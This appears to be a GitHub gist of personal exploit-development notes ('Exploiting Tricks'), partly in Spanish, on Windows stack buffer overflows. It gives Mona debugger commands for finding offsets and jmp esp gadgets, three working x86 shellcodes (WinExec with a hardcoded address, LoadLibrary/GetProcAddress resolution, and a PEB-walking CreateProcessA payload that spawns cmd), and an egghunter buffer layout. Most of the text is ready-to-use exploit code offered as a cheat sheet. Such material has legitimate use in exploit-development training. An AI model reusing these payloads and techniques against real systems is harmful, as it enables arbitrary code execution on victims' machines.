Skip to content

Instantly share code, notes, and snippets.

@adon90 adon90/exploiting.txt
Last active Aug 1, 2018

Embed
What would you like to do?
Exploiting Tricks
Mona tricks:
---------------
!mona pc 1000 -> Launch exploit with pattern
!mona findmsp -> autocalculate offset, ESP size.....
No jmp esp in Exec Region (.text) but no DEP:
!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
-----------------
SHELLCODES
1. WinExec Hardcoded
arwin kernel32 WinExec
--------------------------
shellcode = ("\x33\xc0"
"\x50"
"\x68\x2E\x65\x78\x65" #.exe
"\x68\x63\x61\x6C\x63" #calc
"\x8B\xC4"
"\x6A\x01"
"\x50"
"\xBB\xED\x2A\x86\x7C" # arwin extracted WinExec address
"\xFF\xD3")
-------------------------------------
http://www.fuzzysecurity.com/tutorials/expDev/6.html
https://github.com/73696e65/windows-exploits/blob/master/arwin.exe
2. GetProcess Address + LoadLibrary (GetProcAddress(LoadLibraryA("kernel32.dll"), "WinExec"))
Buscar los punteros en .rdata a GetProcAddress y LoadLibrary a partir del EntryPoint:
Search For > Name in all Modules
Buscar la direccion del puntero en Follow in Dump y usarla como puntero.
------------------------------------------------
shellcode = "\x31\xC9" # xor ecx,ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x2e\x64\x6c\x6c" # .dll
shellcode += "\x68\x65\x6c\x33\x32" # el32
shellcode += "\x68\x6b\x65\x72\x6e" # kern
shellcode += "\x54" # PUSH ESP
shellcode += "\xff\x15\x7b\x1d\x80\x7c" # *LoadLibrary
shellcode += "\x68\x78\x65\x63\x20" # xec
shellcode += "\x68\x57\x69\x6e\x45" # wine
shellcode += "\x54" # push esp
shellcode += "\x50" # push eax (Retorno LoadLibrary Kernel32)
shellcode += "\xff\x15\x40\xae\x80\x7c" # *GetProcessAddress
shellcode += "\x31\xC9" # xor ecx,ecx
shellcode += "\x51" # push ecx
shellcode += "\x68\x2e\x65\x78\x65" #.exe
shellcode += "\x68\x63\x61\x6c\x63" # calc
shellcode += "\x54" # PUSH ESP
shellcode += "\xff\xd0" # call eax (eax es el retorno de GetProcessAddress)
------------------------------------------------------
3. WinExec extraída del PEB
----------------------------------------------------------
shellcode =("\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd"
"\x68\x63\x6d\x64\x20" # payload (cmd )
"\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7")
---------------------------------------------------------
https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
https://govolution.wordpress.com/2015/02/07/one-for-all-null-free-windows-winexec-shellcode-tool-for-generating-payload/
Egghunter
------------
evil = "A" * (510-len(hunter)-50) + nops + hunter + "\x90" * 5 + jmp_esp + "\xE9\xC0\xFF\xFF\xFF"
Important to put NOPS between the hunter and the JMP ESP.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.